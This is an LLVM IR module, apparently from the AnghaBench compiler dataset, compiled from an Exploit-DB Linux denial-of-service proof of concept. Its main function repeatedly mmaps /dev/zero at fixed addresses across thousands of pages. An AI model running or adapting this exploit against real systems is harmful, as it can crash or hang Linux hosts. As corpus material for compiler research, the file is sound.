; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/linux/dos/extr_40819.c_main.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/linux/dos/extr_40819.c_main.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

@.str = private unnamed_addr constant [10 x i8] c"/dev/zero\00", align 1
@O_RDONLY = common dso_local global i32 0, align 4
@PROT_READ = common dso_local global i32 0, align 4
@MAP_SHARED = common dso_local global i32 0, align 4
@MAP_FIXED = common dso_local global i32 0, align 4

; Function Attrs: noinline nounwind optnone uwtable
define dso_local void @main() #0 {
  %1 = alloca i32, align 4
  %2 = alloca i32, align 4
  %3 = load i32, i32* @O_RDONLY, align 4
  %4 = call i32 @open(i8* getelementptr inbounds ([10 x i8], [10 x i8]* @.str, i64 0, i64 0), i32 %3)
  store i32 %4, i32* %1, align 4
  store i32 0, i32* %2, align 4
  br label %5

5:                                                ; preds = %18, %0
  %6 = load i32, i32* %2, align 4
  %7 = icmp slt i32 %6, 26999
  br i1 %7, label %8, label %21

8:                                                ; preds = %5
  %9 = load i32, i32* %2, align 4
  %10 = mul nsw i32 65536, %9
  %11 = inttoptr i32 %10 to i8*
  %12 = load i32, i32* @PROT_READ, align 4
  %13 = load i32, i32* @MAP_SHARED, align 4
  %14 = load i32, i32* @MAP_FIXED, align 4
  %15 = or i32 %13, %14
  %16 = load i32, i32* %1, align 4
  %17 = call i32 @mmap(i8* %11, i32 1, i32 %12, i32 %15, i32 %16, i32 0)
  br label %18

18:                                               ; preds = %8
  %19 = load i32, i32* %2, align 4
  %20 = add nsw i32 %19, 1
  store i32 %20, i32* %2, align 4
  br label %5

21:                                               ; preds = %5
  ret void
}

declare dso_local i32 @open(i8*, i32) #1

declare dso_local i32 @mmap(i8*, i32, i32, i32, i32, i32) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
